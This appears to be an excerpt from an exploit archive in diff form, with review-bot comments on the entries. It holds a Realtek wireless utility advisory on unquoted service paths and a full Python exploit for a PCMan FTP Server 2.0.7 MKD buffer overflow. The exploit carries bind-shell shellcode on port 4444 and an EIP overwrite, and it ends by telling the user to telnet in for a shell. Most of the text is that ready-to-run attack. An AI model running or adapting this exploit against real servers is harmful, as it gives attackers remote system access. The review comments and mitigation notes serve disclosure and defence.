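Review bot: The title claims remote code execution, but the evidence in the trailing comment is an access violation on a read (`MOV AL,[ESI+EDX]`) with `41414141` in the return chain, and the file is stored under platforms/windows/dos. The header comment should say that the page demonstrates a crash with overwritten stack data and that code execution is the assessed impact rather than something shown here. The comment also records that Samsung did not respond but gives defenders nothing to act on; a line such as `Mitigation: set the Internet Explorer kill bit for CLSID {D3B78638-78BA-4587-88FE-0537A0825A72} or uninstall iPOLiS Device Manager 1.12.2` would cover that.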


@ -0,0 +1,51 @@
Realtek 11n Wireless LAN utility privilege escalation.
Vulnerability Discovered by Humberto Cabrera @dniz0r
http://zeroscience.mk @zeroscience
Summary:
? Realtek 11n Wireless LAN utility is deployed and used by realtek
alfa cards and more in order to help diagnose and view wireless card
properties.
Description:
- Unquoted Privilege escalation that allows a user to gain SYSTEM
privileges.
Date - 12 Feb 2015
Version: 700.1631.106.2011
Vendor: www.realtek.com.tw
Advisory URL:
https://eaty0face.wordpress.com/2015/02/13/realtek-11n-wireless-lan-utility-privilege-escalation/
Tested on: Win7
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: realtek11ncu
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\REALTEK\11n USB Wireless LAN
Utility\RtlService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Realtek11nCU
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Windows\system32>sc qc realtek11nsu
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: realtek11nsu
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\REALTEK\Wireless LAN
Utility\RtlService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Realtek11nSU
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
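Review bot: The description says only "Unquoted Privilege escalation" and the file ends at the `sc qc` output without naming the defect or a fix; what the output shows is that both `BINARY_PATH_NAME` values contain spaces and are not wrapped in quotes while the services start as `LocalSystem`. A remediation line would complete the advisory, e.g. `Fix: wrap the service ImagePath in double quotes and confirm that standard users cannot write to the parent directories`. The first query block also lacks the command that produced it, unlike the second (`sc qc realtek11nsu`).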


@ -0,0 +1,58 @@
# Title: PCMan FTP Server v2.0.7 Buffer Overflow - MKD Command
# Date : 12/02/2015
# Author: R-73eN
# Software: PCMan FTP Server v2.0.7
# Tested On Windows Xp SP3
import socket
#348 Bytes Bind Shell Port TCP/4444
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
a = s.recv(1024)
print ' [+] ' + a
s.send('User anonymous')
s.recv(1024)
s.send('pass')
s.recv(1024)
print ' [+] Logged in as Anonymous ...'
evil = 'A' * 2007 #JUNK
evil += '\x65\x82\xA5\x7C' # EIP overwrite jmp esp / shell32.dll
evil += '\x90' * 10
evil += shellcode
print ' [+] Sending Payload ...'
s.send('mkd ' + evil)
print ' [+] You got shell .....\n telnet ' + server + ' 4444'